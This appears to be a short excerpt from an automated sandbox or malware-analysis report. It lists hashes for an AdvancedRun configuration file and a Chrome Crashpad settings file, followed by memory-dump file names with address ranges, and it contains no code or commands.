SHA256 97c15ea73fe93c81846c1f43433e336b6f1cfd9a88168350b03f5b1b97ef5ecf
SHA512 45b845a3e981de0e2dfcdb81cf1c56ec1287b96092500cb2363e5e2c6b337a22025a421fcddcbbb384ae35ee908e21fdb702bf6da0aa7ea077a5b1b03dc173b6

C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.cfg

MD5 904eaad00901f98cdf00b7c910139a7f
SHA1 9a49fa7da54f9372f5ecb287ae325d1f51b9c376
SHA256 1c1b57f22a38567a6f9b75086f703544d73bb6cafed06bdbcd9e4250cdb84e50
SHA512 63d701a4d7b7dcdc565ad42278f43339833b4ab71cbc93b53a90a6bd85fdb6e94b5caeba1549f076bd18f4041345e6c3e7847583ff27b8859555ae9d64b996e9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 efdf336c3d3a1adb92b2ad84b9e0ddf8
SHA1 d12684bf46d8efdc7fe65d72974a64f8cfc83aae
SHA256 a3b64fe67ea4be6fd1cad4f43ab347f08f3c05afd11552101ddc5f80fd3e31cc
SHA512 d47956132f95e0f8c31b0d8e8b23a7748b4fd39b6acf746e65600499bb6dac8bf3ba64843a090e41066de86eadd02aeb9c1ebd3ab9cdee4bd9d7867febbb696e

memory/244-3008-0x00007FF978F10000-0x00007FF978F20000-memory.dmp

memory/244-3010-0x00007FF978F10000-0x00007FF978F20000-memory.dmp

memory/244-3009-0x00007FF978F10000-0x00007FF978F20000-memory.dmp

memory/244-3011-0x00007FF978F10000-0x00007FF978F20000-memory.dmp

memory/244-3012-0x00007FF978F10000-0x00007FF978F20000-memory.dmp

memory/244-3013-0x00007FF9765B0000-0x00007FF9765C0000-memory.dmp

memory/244-3014-0x00007FF9765B0000-0x00007FF9765C0000-memory.dmp